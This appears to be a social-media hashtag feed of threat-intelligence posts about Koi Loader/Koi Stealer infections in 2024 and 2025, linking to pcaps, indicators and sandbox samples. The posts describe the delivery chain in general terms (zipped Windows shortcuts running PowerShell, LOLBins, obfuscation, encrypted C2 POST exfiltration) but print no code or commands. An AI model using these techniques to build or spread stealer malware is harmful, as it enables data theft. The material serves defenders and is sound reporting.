Screenshot of the web page for the associated blog post.

2025-06-21 (Saturday): #KoiLoader / #KoiStealer infection. #pcap of the infection traffic, associated malware/files, and some of the indicators available at www.malware-traffic-analysis.net/2025/06/21/i...

List of several URLs seen recently that return a zip archive containing a Windows shortcut for Koi Loader / Koi Stealer.

Screenshot of a web browser when downloading one of the zip archives for Koi Loader / Koi Stealer from one of the Google Sites URLs.

Examining the Windows shortcut extracted from the downloaded zip archive. The shortcut runs PowerShell script to infect a host with Koi Loader / Koi Stealer.

Traffic from a Koi Loader / Koi Stealer infection filtered in Wireshark.

2025-05-09 (Friday): #KoiLoader / #KoiStealer activity. Same type of distribution chain and infection characteristics as always.

Example of downloaded zip available at:

- bazaar.abuse.ch/sample/35236...
- tria.ge/250510-a2fw5...
- app.any.run/tasks/3adefb...

C2 servers use encrypted HTTP POST to steal victim data, masking malicious traffic. Attackers rely on LOLBins & script obfuscation to evade detection.

#Infosec #ThreatHunting #APT #KoiLoader

KoiLoader Reloaded: New Variant Uses LNK Abuse, Script Chains, and PowerShell to Deliver Stealer Payload Learn about the KoiLoader malware and its risks. Discover how KoiLoader facilitates Command and Control operations in cyber attacks.

#KoiLoader reloaded: New variant abuses LNK files, script chains & PowerShell to deliver info-stealers (Raccoon, Vidar). Evades detection via multi-stage execution.

Tactics: securityonline.info/koiloader-re...

31st March – Threat Intelligence Report - Check Point Research For the latest discoveries in cyber research for the week of 31st March, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES New York University (NYU) suffered a cyber-attack wh...

March Threat Intel Recap: #EarthAlux APT targets LATAM, #KoiLoader evolves with LNK abuse, and 24K+ IPs scan PAN-OS VPNs.

Critical trends for defenders: research.checkpoint.com/2025/31st-ma...

Screenshot of the malware-traffic-analysis.net page with analysis of the Koi Loader/Koi Stealer activity from 2025-01-23. The initial EXE kicking off this infection was submitted to VirusTotal on 2024-11-29, but the C2 infrastructure for this infection was still active as of 2025-01-23.

2025-01-23 (Thursday): Windows EXE fimpersonating an installer submitted to VT on 2024-11-29 leads to #KoiLoader / #KoiStealer infection. A #pcap of the infection traffic, the associated malware/artifacts, and some of the indicators are available at malware-traffic-analysis.net/2025/01/23/i...

Screenshot of the web page hosting the quick post for Koi Loader/Koi Stealer activity listing the IOCs, pcap, and malware/artifacts.

2025-01-21 (Tuesday): Quick post with a #pcap, malware/artifacts and IOCs for #KoiLoader / #KoiStealer activity at malware-traffic-analysis.net/2025/01/21/i...

Latest version of ACCE Release Notes for v2.5.20240418 are live: www.ciphertechsolutions.com/acce-release... #GhostlyStealer #KoiLoader #KoiStealer #PackLab #BroomStick